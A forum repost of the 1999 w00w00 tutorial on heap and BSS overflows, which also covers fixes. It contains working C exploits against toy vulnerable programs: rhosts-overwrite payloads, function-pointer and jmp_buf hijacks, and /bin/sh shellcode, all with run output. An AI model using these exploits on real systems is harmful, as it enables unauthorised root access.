Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. w00w00 on Heap Overflows Subject: w00w00 on Heap Overflows This is a PRELIMINARY BETA VERSION of our final article! We apologize for any mistakes. We still need to add a few more things. [ Note: You may also get this article off of ] [ http://www.w00w00.org/articles.html. ] w00w00 on Heap Overflows By: Matt Conover (a.k.a. Shok) & w00w00 Security Team ------------------------------------------------------------------------------ Copyright (C) January 1999, Matt Conover & w00w00 Security Development You may freely redistribute or republish this article, provided the following conditions are met: 1. This article is left intact (no changes made, the full article published, etc.) 2. Proper credit is given to its authors; Matt Conover (Shok) and the w00w00 Security Development (WSD). You are free to rewrite your own articles based on this material (assuming the above conditions are met). It'd also be appreciated if an e-mail is sent to either mattc@repsec.com or shok@dataforce.net to let us know you are going to be republishing this article or writing an article based upon one of our ideas. ------------------------------------------------------------------------------ Prelude: Heap/BSS-based overflows are fairly common in applications today; yet, they are rarely reported. Therefore, we felt it was appropriate to present a "heap overflow" tutorial. The biggest critics of this article will probably be those who argue heap overflows have been around for a while. Of course they have, but that doesn't negate the need for such material. In this article, we will refer to "overflows involving the stack" as "stack-based overflows" ("stack overflow" is misleading) and "overflows involving the heap" as "heap-based overflows". This article should provide the following: a better understanding of heap-based overflows along with several methods of exploitation, demonstrations, and some possible solutions/fixes. Prerequisites to this article: a general understanding of computer architecture, assembly, C, and stack overflows. This is a collection of the insights we have gained through our research with heap-based overflows and the like. We have written all the examples and exploits included in this article; therefore, the copyright applies to them as well. Why Heap/BSS Overflows are Significant ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As more system vendors add non-executable stack patches, or individuals apply their own patches (e.g., Solar Designer's non-executable stack patch), a different method of penetration is needed by security consultants (or else, we won't have jobs!). Let me give you a few examples: 1. Searching for the word "heap" on BugTraq (for the archive, see www.geek-girl.com/bugtraq), yields only 40+ matches, whereas "stack" yields 2300+ matches (though several are irrelevant). Also, "stack overflow" gives twice as many matches as "heap" does. 2. Solaris (an OS developed by Sun Microsystems), as of Solaris 2.6, sparc Solaris includes a "protect_stack" option, but not an equivalent "protect_heap" option. Fortunately, the bss is not executable (and need not be). 3. There is a "StackGuard" (developed by Crispin Cowan et. al.), but no equivalent "HeapGuard". 4. Using a heap/bss-based overflow was one of the "potential" methods of getting around StackGuard. The following was posted to BugTraq by Tim Newsham several months ago: > Finally the precomputed canary values may be a target > themselves. If there is an overflow in the data or bss segments > preceding the precomputed canary vector, an attacker can simply > overwrite all the canary values with a single value of his > choosing, effectively turning off stack protection. 5. Some people have actually suggested making a "local" buffer a "static" buffer, as a fix! This not very wise; yet, it is a fairly common misconception of how the heap or bss work. Although heap-based overflows are not new, they don't seem to be well understood. Note: One argument is that the presentation of a "heap-based overflow" is equivalent to a "stack-based overflow" presentation. However, only a small proportion of this article has the same presentation (if you will) that is equivalent to that of a "stack-based overflow". People go out of their way to prevent stack-based overflows, but leave their heaps/bss' completely open! On most systems, both heap and bss are both executable and writeable (an excellent combination). This makes heap/bss overflows very possible. But, I don't see any reason for the bss to be executable! What is going to be executed in zero-filled memory?! For the security consultant (the ones doing the penetration assessment), most heap-based overflows are system and architecture independent, including those with non-executable heaps. This will all be demonstrated in the "Exploiting Heap/BSS Overflows" section. Terminology ~~~~~~~~~~~ An executable file, such as ELF (Executable and Linking Format) executable, has several "sections" in the executable file, such as: the PLT (Procedure Linking Table), GOT (Global Offset Table), init (instructions executed on initialization), fini (instructions to be executed upon termination), and ctors and dtors (contains global constructors/destructors). "Memory that is dynamically allocated by the application is known as the heap." The words "by the application" are important here, as on good systems most areas are in fact dynamically allocated at the kernel level, while for the heap, the allocation is requested by the application. Heap and Data/BSS Sections ~~~~~~~~~~~~~~~~~~~~~~~~~~ The heap is an area in memory that is dynamically allocated by the application. The data section initialized at compile-time. The bss section contains uninitialized data, and is allocated at run-time. Until it is written to, it remains zeroed (or at least from the application's point-of-view). Note: When we refer to a "heap-based overflow" in the sections below, we are most likely referring to buffer overflows of both the heap and data/bss sections. On most systems, the heap grows up (towards higher addresses). Hence, when we say "X is below Y," it means X is lower in memory than Y. Exploiting Heap/BSS Overflows ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In this section, we'll cover several different methods to put heap/bss overflows to use. Most of examples for Unix-dervied x86 systems, will also work in DOS and Windows (with a few changes). We've also included a few DOS/Windows specific exploitation methods. An advanced warning: this will be the longest section, and should be studied the most. Note: In this article, I use the "exact offset" approach. The offset must be closely approximated to its actual value. The alternative is "stack-based overflow approach" (if you will), where one repeats the addresses to increase the likelihood of a successful exploit. While this example may seem unnecessary, we're including it for those who are unfamiliar with heap-based overflows. Therefore, we'll include this quick demonstration: ----------------------------------------------------------------------------- /* demonstrates dynamic overflow in heap (initialized data) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define BUFSIZE 16 #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */ int main() { u_long diff; char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE); diff = (u_long)buf2 - (u_long)buf1; printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2, diff); memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0'; printf("before overflow: buf2 = %s\n", buf2); memset(buf1, 'B', (u_int)(diff + OVERSIZE)); printf("after overflow: buf2 = %s\n", buf2); return 0; } ----------------------------------------------------------------------------- If we run this, we'll get the following: [root /w00w00/heap/examples/basic]# ./heap1 8 buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes before overflow: buf2 = AAAAAAAAAAAAAAA after overflow: buf2 = BBBBBBBBAAAAAAA This works because buf1 overruns its boundaries into buf2's heap space. But, because buf2's heap space is still valid (heap) memory, the program doesn't crash. Note: A possible fix for a heap-based overflow, which will be mentioned later, is to put "canary" values between all variables on the heap space (like that of StackGuard mentioned later) that mustn't be changed throughout execution. You can get the complete source to all examples used in this article, from the file attachment, heaptut.tgz. You can also download this from our article archive at http://www.w00w00.org/articles.html. Note: To demonstrate a bss-based overflow, change line: from: 'char *buf = malloc(BUFSIZE)', to: 'static char buf[BUFSIZE]' Yes, that was a very basic example, but we wanted to demonstrate a heap overflow at its most primitive level. This is the basis of almost all heap-based overflows. We can use it to overwrite a filename, a password, a saved uid, etc. Here is a (still primitive) example of manipulating pointers: ----------------------------------------------------------------------------- /* demonstrates static pointer overflow in bss (uninitialized data) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> #define BUFSIZE 16 #define ADDRLEN 4 /* # of bytes in an address */ int main() { u_long diff; static char buf[BUFSIZE], *bufptr; bufptr = buf, diff = (u_long)&bufptr - (u_long)buf; printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", &bufptr, bufptr, buf, diff, diff); memset(buf, 'A', (u_int)(diff + ADDRLEN)); printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", &bufptr, bufptr, buf, diff, diff); return 0; } ----------------------------------------------------------------------------- The results: [root /w00w00/heap/examples/basic]# ./heap3 bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes When run, one clearly sees that the pointer now points to a different address. Uses of this? One example is that we could overwrite a temporary filename pointer to point to a separate string (such as argv[1], which we could supply ourselves), which could contain "/root/.rhosts". Hopefully, you are starting to see some potential uses. To demonstrate this, we will use a temporary file to momentarily save some input from the user. This is our finished "vulnerable program": ----------------------------------------------------------------------------- /* * This is a typical vulnerable program. It will store user input in a * temporary file. * * Compile as: gcc -o vulprog1 vulprog1.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> #define ERROR -1 #define BUFSIZE 16 /* * Run this vulprog as root or change the "vulfile" to something else. * Otherwise, even if the exploit works, it won't have permission to * overwrite /root/.rhosts (the default "example"). */ int main(int argc, char **argv) { FILE *tmpfd; static char buf[BUFSIZE], *tmpfile; if (argc <= 1) { fprintf(stderr, "Usage: %s <garbage>\n", argv[0]); exit(ERROR); } tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */ printf("before: tmpfile = %s\n", tmpfile); printf("Enter one line of data to put in %s: ", tmpfile); gets(buf); printf("\nafter: tmpfile = %s\n", tmpfile); tmpfd = fopen(tmpfile, "w"); if (tmpfd == NULL) { fprintf(stderr, "error opening %s: %s\n", tmpfile, strerror(errno)); exit(ERROR); } fputs(buf, tmpfd); fclose(tmpfd); } ----------------------------------------------------------------------------- The aim of this "example" program is to demonstrate that something of this nature can easily occur in programs (although hopefully not setuid or root-owned daemon servers). And here is our exploit for the vulnerable program: ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * This will exploit vulprog1.c. It passes some arguments to the * program (that the vulnerable program doesn't use). The vulnerable * program expects us to enter one line of input to be stored * temporarily. However, because of a static buffer overflow, we can * overwrite the temporary filename pointer, to have it point to * argv[1] (which we could pass as "/root/.rhosts"). Then it will * write our temporary line to this file. So our overflow string (what * we pass as our input line) will be: * + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address * * We use "+ +" (all hosts), followed by '#' (comment indicator), to * prevent our "attack code" from causing problems. Without the * "#", programs using .rhosts would misinterpret our attack code. * * Compile as: gcc -o exploit1 exploit1.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define BUFSIZE 256 #define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */ #define VULPROG "./vulprog1" #define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */ /* get value of sp off the stack (used to calculate argv[1] address) */ u_long getesp() { __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */ } int main(int argc, char **argv) { u_long addr; register int i; int mainbufsize; char *mainbuf, buf[DIFF+6+1] = "+ +\t# "; /* ------------------------------------------------------ */ if (argc <= 1) { fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]); exit(ERROR); } /* ------------------------------------------------------ */ memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# "); memset(buf + strlen(buf), 'A', DIFF); addr = getesp() + atoi(argv[1]); /* reverse byte order (on a little endian system) */ for (i = 0; i < sizeof(u_long); i++) buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255); mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13; mainbuf = (char *)malloc(mainbufsize); memset(mainbuf, 0, sizeof(mainbuf)); snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n", buf, VULPROG, VULFILE); printf("Overflowing tmpaddr to point to %p, check %s after.\n\n", addr, VULFILE); system(mainbuf); return 0; } ----------------------------------------------------------------------------- Here's what happens when we run it: [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320 Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after. before: tmpfile = /tmp/vulprog.tmp Enter one line of data to put in /tmp/vulprog.tmp: after: tmpfile = /vulprog1 Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are close: [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330 Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after. before: tmpfile = /tmp/vulprog.tmp Enter one line of data to put in /tmp/vulprog.tmp: after: tmpfile = /root/.rhosts [root /tmp/heap/examples/advanced/vul-pkg1]# Got it! The exploit overwrites the buffer that the vulnerable program uses for gets() input. At the end of its buffer, it places the address of where we assume argv[1] of the vulnerable program is. That is, we overwrite everything between the overflowed buffer and the tmpfile pointer. We ascertained the tmpfile pointer's location in memory by sending arbitrary lengths of "A"'s until we discovered how many "A"'s it took to reach the start of tmpfile's address. Also, if you have source to the vulnerable program, you can also add a "printf()" to print out the addresses/offsets between the overflowed data and the target data (i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)'). (Un)fortunately, the offsets usually change at compile-time (as far as I know), but we can easily recalculate, guess, or "brute force" the offsets. Note: Now that we need a valid address (argv[1]'s address), we must reverse the byte order for little endian systems. Little endian systems use the least significant byte first (x86 is little endian) so that 0x12345678 is 0x78563412 in memory. If we were doing this on a big endian system (such as a sparc) we could drop out the code to reverse the byte order. On a big endian system (like sparc), we could leave the addresses alone. Further note: So far none of these examples required an executable heap! As I briefly mentioned in the "Why Heap/BSS Overflows are Significant" section, these (with the exception of the address byte order) previous examples were all system/architecture independent. This is useful in exploiting heap-based overflows. With knowledge of how to overwrite pointers, we're going to show how to modify function pointers. The downside to exploiting function pointers (and the others to follow) is that they require an executable heap. A function pointer (i.e., "int (*funcptr)(char *str)") allows a programmer to dynamically modify a function to be called. We can overwrite a function pointer by overwriting its address, so that when it's executed, it calls the function we point it to instead. This is good news because there are several options we have. First, we can include our own shellcode. We can do one of the following with shellcode: 1. argv[] method: store the shellcode in an argument to the program (requiring an executable stack) 2. heap offset method: offset from the top of the heap to the estimated address of the target/overflow buffer (requiring an executable heap) Note: There is a greater probability of the heap being executable than the stack on any given system. Therefore, the heap method will probably work more often. A second method is to simply guess (though it's inefficient) the address of a function, using an estimated offset of that in the vulnerable program. Also, if we know the address of system() in our program, it will be at a very close offset, assuming both vulprog/exploit were compiled the same way. The advantage is that no executable is required. Note: Another method is to use the PLT (Procedure Linking Table) which shares the address of a function in the PLT. I first learned the PLT method from str (stranJer) in a non-executable stack exploit for sparc. The reason the second method is the preferred method, is simplicity. We can guess the offset of system() in the vulprog from the address of system() in our exploit fairly quickly. This is synonymous on remote systems (assuming similar versions, operating systems, and architectures). With the stack method, the advantage is that we can do whatever we want, and we don't require compatible function pointers (i.e., char (*funcptr)(int a) and void (*funcptr)() would work the same). The disadvantage (as mentioned earlier) is that it requires an executable stack. Here is our vulnerable program for the following 2 exploits: ----------------------------------------------------------------------------- /* * Just the vulnerable program we will exploit. * Compile as: gcc -o vulprog vulprog.c (or change exploit macros) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 64 int goodfunc(const char *str); /* funcptr starts out as this */ int main(int argc, char **argv) { static char buf[BUFSIZE]; static int (*funcptr)(const char *str); if (argc <= 2) { fprintf(stderr, "Usage: %s <buf> <goodfunc arg>\n", argv[0]); exit(ERROR); } printf("(for 1st exploit) system() = %p\n", system); printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]); printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf); funcptr = (int (const char *str))goodfunc; printf("before overflow: funcptr points to %p\n", funcptr); memset(buf, 0, sizeof(buf)); strncpy(buf, argv[1], strlen(argv[1])); printf("after overflow: funcptr points to %p\n", funcptr); (void)(*funcptr)(argv[2]); return 0; } /* ---------------------------------------------- */ /* This is what funcptr would point to if we didn't overflow it */ int goodfunc(const char *str) { printf("\nHi, I'm a good function. I was passed: %s\n", str); return 0; } ----------------------------------------------------------------------------- Our first example, is the system() method: ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * Demonstrates overflowing/manipulating static function pointers in * the bss (uninitialized data) to execute functions. * * Try in the offset (argv[2]) in the range of 0-20 (10-16 is best) * To compile use: gcc -o exploit1 exploit1.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define BUFSIZE 64 /* the estimated diff between funcptr/buf */ #define VULPROG "./vulprog" /* vulnerable program location */ #define CMD "/bin/sh" /* command to execute if successful */ #define ERROR -1 int main(int argc, char **argv) { register int i; u_long sysaddr; static char buf[BUFSIZE + sizeof(u_long) + 1] = {0}; if (argc <= 1) { fprintf(stderr, "Usage: %s <offset>\n", argv[0]); fprintf(stderr, "[offset = estimated system() offset]\n\n"); exit(ERROR); } sysaddr = (u_long)&system - atoi(argv[1]); printf("trying system() at 0x%lx\n", sysaddr); memset(buf, 'A', BUFSIZE); /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(sysaddr); i++) buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; execl(VULPROG, VULPROG, buf, CMD, NULL); return 0; } ----------------------------------------------------------------------------- When we run this with an offset of 16 (which may vary) we get: [root /w00w00/heap/examples]# ./exploit1 16 trying system() at 0x80484d0 (for 1st exploit) system() = 0x80484d0 (for 2nd exploit, stack method) argv[2] = 0xbffffd3c (for 2nd exploit, heap offset method) buf = 0x804a9a8 before overflow: funcptr points to 0x8048770 after overflow: funcptr points to 0x80484d0 bash# And our second example, using both argv[] and heap offset method: ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * This demonstrates how to exploit a static buffer to point the * function pointer at argv[] to execute shellcode. This requires * an executable heap to succeed. * * The exploit takes two argumenst (the offset and "heap"/"stack"). * For argv[] method, it's an estimated offset to argv[2] from * the stack top. For the heap offset method, it's an estimated offset * to the target/overflow buffer from the heap top. * * Try values somewhere between 325-345 for argv[] method, and 420-450 * for heap. * * To compile use: gcc -o exploit2 exploit2.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 64 /* estimated diff between buf/funcptr */ #define VULPROG "./vulprog" /* where the vulprog is */ char shellcode[] = /* just aleph1's old shellcode (linux x86) */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; u_long getesp() { __asm__("movl %esp,%eax"); /* set sp as return value */ } int main(int argc, char **argv) { register int i; u_long sysaddr; char buf[BUFSIZE + sizeof(u_long) + 1]; if (argc <= 2) { fprintf(stderr, "Usage: %s <offset> <heap | stack>\n", argv[0]); exit(ERROR); } if (strncmp(argv[2], "stack", 5) == 0) { printf("Using stack for shellcode (requires exec. stack)\n"); sysaddr = getesp() + atoi(argv[1]); printf("Using 0x%lx as our argv[1] address\n\n", sysaddr); memset(buf, 'A', BUFSIZE + sizeof(u_long)); } else { printf("Using heap buffer for shellcode " "(requires exec. heap)\n"); sysaddr = (u_long)sbrk(0) - atoi(argv[1]); printf("Using 0x%lx as our buffer's address\n\n", sysaddr); if (BUFSIZE + 4 + 1 < strlen(shellcode)) { fprintf(stderr, "error: buffer is too small for shellcode " "(min. = %d bytes)\n", strlen(shellcode)); exit(ERROR); } strcpy(buf, shellcode); memset(buf + strlen(shellcode), 'A', BUFSIZE - strlen(shellcode) + sizeof(u_long)); } buf[BUFSIZE + sizeof(u_long)] = '\0'; /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(sysaddr); i++) buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; execl(VULPROG, VULPROG, buf, shellcode, NULL); return 0; } ----------------------------------------------------------------------------- When we run this with an offset of 334 for the argv[] method we get: [root /w00w00/heap/examples] ./exploit2 334 stack Using stack for shellcode (requires exec. stack) Using 0xbffffd16 as our argv[1] address (for 1st exploit) system() = 0x80484d0 (for 2nd exploit, stack method) argv[2] = 0xbffffd16 (for 2nd exploit, heap offset method) buf = 0x804a9a8 before overflow: funcptr points to 0x8048770 after overflow: funcptr points to 0xbffffd16 bash# When we run this with an offset of 428-442 for the heap offset method we get: [root /w00w00/heap/examples] ./exploit2 428 heap Using heap buffer for shellcode (requires exec. heap) Using 0x804a9a8 as our buffer's address (for 1st exploit) system() = 0x80484d0 (for 2nd exploit, stack method) argv[2] = 0xbffffd16 (for 2nd exploit, heap offset method) buf = 0x804a9a8 before overflow: funcptr points to 0x8048770 after overflow: funcptr points to 0x804a9a8 bash# Note: Another advantage to the heap method is that you have a large working range. With argv[] (stack) method, it needed to be exact. With the heap offset method, any offset between 428-442 worked. As you can see, there are several different methods to exploit the same problem. As an added bonus, we'll include a final type of exploitation that uses jmp_bufs (setjmp/longjmp). jmp_buf's basically store a stack frame, and jump to it at a later point in execution. If we get a chance to overflow a buffer between setjmp() and longjmp(), that's above the overflowed buffer, this can be exploited. We can set these up to emulate the behavior of a stack-based overflow (as does the argv[] shellcode method used earlier, also). Now this is the jmp_buf for an x86 system. These will needed to be modified for other architectures, accordingly. First we will include a vulnerable program again: ----------------------------------------------------------------------------- /* * This is just a basic vulnerable program to demonstrate * how to overwrite/modify jmp_buf's to modify the course of * execution. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <setjmp.h> #define ERROR -1 #define BUFSIZE 16 static char buf[BUFSIZE]; jmp_buf jmpbuf; u_long getesp() { __asm__("movl %esp,%eax"); /* the return value goes in %eax */ } int main(int argc, char **argv) { if (argc <= 1) { fprintf(stderr, "Usage: %s <string1> <string2>\n"); exit(ERROR); } printf("[vulprog] argv[2] = %p\n", argv[2]); printf("[vulprog] sp = 0x%lx\n\n", getesp()); if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */ { fprintf(stderr, "error: exploit didn't work\n"); exit(ERROR); } printf("before:\n"); printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di); printf("bp = %p, sp = %p, pc = %p\n\n", jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc); strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */ printf("after:\n"); printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di); printf("bp = %p, sp = %p, pc = %p\n\n", jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc); longjmp(jmpbuf, 1); return 0; } ----------------------------------------------------------------------------- The reason we have the vulnerable program output its stack pointer (esp on x86) is that it makes "guessing" easier for the novice. And now the exploit for it (you should be able to follow it): ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp) * to emulate a stack-based overflow in the heap. By that I mean, * you would overflow the sp/pc of the jmpbuf. When longjmp() is * called, it will execute the next instruction at that address. * Therefore, we can stick shellcode at this address (as the data/heap * section on most systems is executable), and it will be executed. * * This takes two arguments (offsets): * arg 1 - stack offset (should be about 25-45). * arg 2 - argv offset (should be about 310-330). */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 16 #define VULPROG "./vulprog4" char shellcode[] = /* just aleph1's old shellcode (linux x86) */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; u_long getesp() { __asm__("movl %esp,%eax"); /* the return value goes in %eax */ } int main(int argc, char **argv) { int stackaddr, argvaddr; register int index, i, j; char buf[BUFSIZE + 24 + 1]; if (argc <= 1) { fprintf(stderr, "Usage: %s <stack offset> <argv offset>\n", argv[0]); fprintf(stderr, "[stack offset = offset to stack of vulprog\n"); fprintf(stderr, "[argv offset = offset to argv[2]]\n"); exit(ERROR); } stackaddr = getesp() - atoi(argv[1]); argvaddr = getesp() + atoi(argv[2]); printf("trying address 0x%lx for argv[2]\n", argvaddr); printf("trying address 0x%lx for sp\n\n", stackaddr); /* * The second memset() is needed, because otherwise some values * will be (null) and the longjmp() won't do our shellcode. */ memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12); buf[BUFSIZE+24] = '\0'; /* ------------------------------------- */ /* * We need the stack pointer, because to set pc to our shellcode * address, we have to overwrite the stack pointer for jmpbuf. * Therefore, we'll rewrite it with the real address again. */ /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(u_long); i++) /* setup BP */ { index = BUFSIZE + 16 + i; buf[index] = (stackaddr >> (i * 8)) & 255; } /* ----------------------------- */ /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(u_long); i++) /* setup SP */ { index = BUFSIZE + 20 + i; buf[index] = (stackaddr >> (i * 8)) & 255; } /* ----------------------------- */ /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(u_long); i++) /* setup PC */ { index = BUFSIZE + 24 + i; buf[index] = (argvaddr >> (i * 8)) & 255; } execl(VULPROG, VULPROG, buf, shellcode, NULL); return 0; } ----------------------------------------------------------------------------- Ouch, that was sloppy. But anyway, when we run this with a stack offset of 36 and a argv[2] offset of 322, we get the following: [root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322 trying address 0xbffffcf6 for argv[2] trying address 0xbffffb90 for sp [vulprog] argv[2] = 0xbffffcf6 [vulprog] sp = 0xbffffb90 before: bx = 0x0, si = 0x40001fb0, di = 0x4000000f bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715 after: bx = 0x1010101, si = 0x1010101, di = 0x1010101 bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6 bash# w00w00! For those of you that are saying, "Okay. I see this works in a controlled environment; but what about in the wild?" There is sensitive data on the heap that can be overflowed. Examples include: functions reason 1. *gets()/*printf(), *scanf() __iob (FILE) structure in heap 2. popen() __iob (FILE) structure in heap 3. *dir() (readdir, seekdir, ...) DIR entries (dir/heap buffers) 4. atexit() static/global function pointers 5. strdup() allocates dynamic data in the heap 7. getenv() stored data on heap 8. tmpnam() stored data on heap 9. malloc() chain pointers 10. rpc callback functions function pointers 11. windows callback functions func pointers kept on heap 12. signal handler pointers function pointers (note: unix tracks in cygnus (gcc for win), these in the kernel, not in the heap) Now, you can definitely see some uses these functions. Room allocated for FILE structures in functions such as printf()'s, fget()'s, readdir()'s, seekdir()'s, etc. can be manipulated (buffer or function pointers). atexit() has function pointers that will be called when the program terminates. strdup() can store strings (such as filenames or passwords) on the heap. malloc()'s own chain pointers (inside its pool) can be manipulated to access memory it wasn't meant to be. getenv() stores data on the heap, which would allow us modify something such as $HOME after it's initially checked. svc/rpc registration functions (librpc, libnsl, etc.) keep callback functions stored on the heap. We will demonstrate overwriting Windows callback functions and overwriting FILE (__iob) structures (with popen). Once you know how to overwrite FILE sturctures with popen(), you can quickly figure out how to do it with other functions (i.e., *printf, *gets, *scanf, etc.), as well as DIR structures (because they are similar. Now for some case studies! Our two "real world" vulnerabilities will be Solaris' tip and BSDI's crontab. The BSDI crontab vulnerability was discovered by mudge of L0pht (see L0pht 1996 Advisory Page). We're reusing it because it's a textbook example of a heap-based overflow (though we will use our own method of exploitation). Our first case study will be the BSDI crontab heap-based overflow. We can pass a long filename, which will overflow a static buffer. Above that buffer in memory, we have a pwd (see pwd.h) structure! This stores a user's user name, password, uid, gid, etc. By overwriting the uid/gid field of the pwd, we can modify the privileges that crond will run our crontab with (as soon as it tries to run our crontab). This script could then put out a suid root shell, because our script will be running with uid/gid 0. Here is our exploit code: ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- When we run it on a BSDI X.X machine, we get the following: [Put exploit output here] 'tip' is run suid uucp on Solaris. It is possible to get root once uucp privileges are gained (but, that's outside the scope of this article). Tip will overflow a static buffer when prompting for a file to send/receive. Above the static buffer in memory is a jmp_buf. By overwriting the static buffer and then causing a SIGINT, we can get shellcode executed (by storing it in argv[]). To exploit successfully, we need to either connect to a valid system, or create a "fake device" with which tip will connect to. Here is our tip exploit: ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- When we run it on a Solaris 2.7 machine, we get the following: [Put exploit output here] Possible Fixes (Workarounds) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Obviously, the best prevention for heap-based overflows is writing good code! Similar to stack-based overflows, there is no real way of preventing heap-based overflows. We can get a copy of the bounds checking gcc/egcs (which should locate most potential heap-based overflows) developed by Richard Jones and Paul Kelly. This program can be downloaded from Richard Jone's homepage at http://www.annexia.demon.co.uk. It detects overruns that might be missed by human error. One example they use is: "int array[10]; for (i = 0; i <= 10; i++) array[i] = 1". I have never used it. Note: For Windows, one could use NuMega's bounds checker which essentially performs the same as the bounds checking gcc. We can always make a non-executable heap patch (as mentioned early, most systems have an executable heap). During a conversation I had with Solar Designer, he mentioned the main problems with a non-executable would involve compilers, interpreters, etc. Note: I added a note section here to reiterate the point a non-executable heap does NOT prevent heap overflows at all. It means we can't execute instructions in the heap. It does NOT prevent us from overwriting data in the heap. Likewise, another possibility is to make a "HeapGuard", which would be the equivalent to Cowan's StackGuard mentioned earlier. He (et. al.) also developed something called "MemGuard", but it's a misnomer. Its function is to prevent a return address (on the stack) from being overwritten (via canary values) on the stack. It does nothing to prevent overflows in the heap or bss. Acknowledgements ~~~~~~~~~~~~~~~~ There has been a significant amount of work on heap-based overflows in the past. We ought to name some other people who have published work involving heap/bss-based overflows (though, our work wasn't based off them). Solar Designer: SuperProbe exploit (function pointers), color_xterm exploit (struct pointers), WebSite (pointer arrays), etc. L0pht: Internet Explorer 4.01 vulnerablity (dildog), BSDI crontab exploit (mudge), etc. Some others who have published exploits for heap-based overflows (thanks to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam Morrison (stdioflow). I'm sure there are many others, and I apologize for excluding anyone. I'd also like to thank the following people who had some direct involvement in this article: str (stranJer), halflife, and jobe. Indirect involvements: Solar Designer, mudge, and other w00w00 affiliates. Other good sources of info include: as/gcc/ld info files (/usr/info/*), BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00 (http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc. Epilogue: Most people who claim their systems are "secure" are saying so out of a lack of knowledge (ignorant seemed a little too strong). Assuming security leads to a false sense of security (e.g., azrael.phrack.com, has remote vulnerabilities involving heap-based overflows that have gone unnoticed for quite a while). Hopefully, people will experiment with heap-based overflows, and 